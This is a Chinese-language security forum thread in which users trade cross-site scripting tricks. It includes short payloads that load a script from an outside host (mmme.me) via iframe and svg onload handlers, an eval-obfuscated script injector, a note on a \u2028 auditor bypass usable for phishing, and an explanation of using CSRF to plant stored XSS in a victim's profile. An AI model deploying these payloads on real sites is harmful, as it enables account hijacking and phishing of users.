@小胖胖要减肥 啊哈,此贴可以顶！

前排留名~~  学习咯~

可以顶

不错唉..

第三點該不是參考我的吧
#7
加個+new Date()可防止cache，比Math.random()短一些

額，我是指那句動態插入js的代碼不是第三點

@/fd 反正大家都是一个论坛的，资源共享嘛

@/fd - =很常见的...

顺便分享几条群里讨论时发的短html加载外部script的vec:
<iframe src='javascript:<script/src=//mmme.me></script>'>
<svg/onload=appendChild(createElement('script')).src='//mmme.me'>
<svg/onload=write('<script/src=//mmme.me></script>')>

說起來較早的Chrome版本可以透過line separator(\u2028) bypass auditor，而\u2028在地址欄又可以隱藏其後的query string…(釣魚？)

@Sogili 我也知道很常見，只是script的地址太巧合

@/fd 这个bug在xss.js的最新版本中有使用 :D

@/fd \u2028或许可以打破很多网站的js string.

@Sogili 還有\u2029呢，看來ECMAScript及HTML5文檔的各種細節是知得愈多愈好

@/fd onload的那个怎么写的，还有其他的么，都贡献出来呀

@Sogili @/fd 大牛们多多总结呀~

@se55i0n 什么时候大牛来个简单的rootkit案例可以让我们这些小菜学习学习，慢慢进阶啊，直接gmail那个太高端了

@小胖胖要减肥 人家那是换美刀的洞洞，我们只有慢慢打小怪兽升级咯~

@小胖胖要减肥 对于这个自己x自己得存储型xss，经常遇到，你说的编辑触发，保存过滤的也遇到了。想到过csrf，但是不知道具体怎么实现让受害者能自己x自己。首先受害者编辑的内容得是xss code，而后他要进行编辑操作，这个过程怎么实现啊？请大哥赐教。。。感谢先

@xfkxfk 比如个人信息，你自己构造一个页面放别人的网站或自己的网站，也可以只是一个post的url，具体看场景，关键是诱使别人点击，比如发帖，说有好东西来看啊，点击后触发post请求，修改个人信息并提交保存，xss code就是某个字段，csrf的wooyun例子很多，具体场景看具体怎么利用吧

@小胖胖要减肥 嗯，原理明白了，下来的慢慢实践，感谢！

学习下

求IE10的

现在短链用不了了，发射型的比如g牛这个WooYun: 腾讯微博一处两用DOM-XSS，能反射，能后门，用csrf来搞直接dom，还能自动跳转到那个搜索页触发xss，这个例子很好啊，就是修复了

加上一个 var obj=document.createElement("script");eval("obj.s"+"rc=xxxxx");document.body.appendChild(obj);

我说这样还不如诱使受害人打开网页-->F12CONSOLE-->粘贴你给的JS代码呢。。

@zsx 你没看懂撒 这个是借刀杀人

受益了，XSS自己的还是经常遇到过

收藏

用回旋镖多好。

xss是干什么用的？